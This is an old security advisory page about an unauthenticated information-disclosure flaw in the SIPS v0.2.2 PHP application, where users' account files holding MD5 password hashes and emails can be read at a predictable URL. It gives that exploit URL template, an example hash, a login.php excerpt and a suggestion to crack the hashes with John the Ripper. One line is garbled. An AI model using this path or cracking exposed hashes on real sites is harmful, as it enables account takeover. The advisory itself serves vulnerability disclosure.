SIPS (PHP)

2008.03.26
Credit: subj
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-200


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

Product : SIPS Version : v0.2.2 WebSite : http://www.squishdot.org Problem : Viewing users account Description: ------------ You could easily look throught any user's account without any permissions. Each of them is in dir names after first letter of his login. For example foo will have url like this one: /sipssys/users/f/foo/user So user's info file could be saw - it gaves u md5-hash of password, that you can try to crack by JtR or other any soft E.g: http://localhost/sips/sipssys/users/t/test/user Password::47bce5c74f589f4867dbd57e9ca9f808 //?????? ??????????&# 1085;?? ?????????? MD5. Email::test@localhost Theme::default ========== login.php: ========== [...] if ($action == "login") { if ($username) { if (file_exists($config["sipssys"] ."/users/$username[0]/ $username/user")) { $cryptpass = md5($password); if (getUserValue($username, "Password") == $cryptpass) { $cryptuser = "$username:$cryptpass"; [...] Exploit: -------- http://[somehost]/[sips_directioy]/sipssys/users/[first_letter_of_UserID ]/ [UserID]/user Link: ===== www.dwcgr0up.com irc.dwcgr0up.biz:6667 Fixs: ===== U can finf all our fix on our homepage [www.dwcgroup.com] Thanks: ======= GipsHack crew : DHGroup etc etc


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top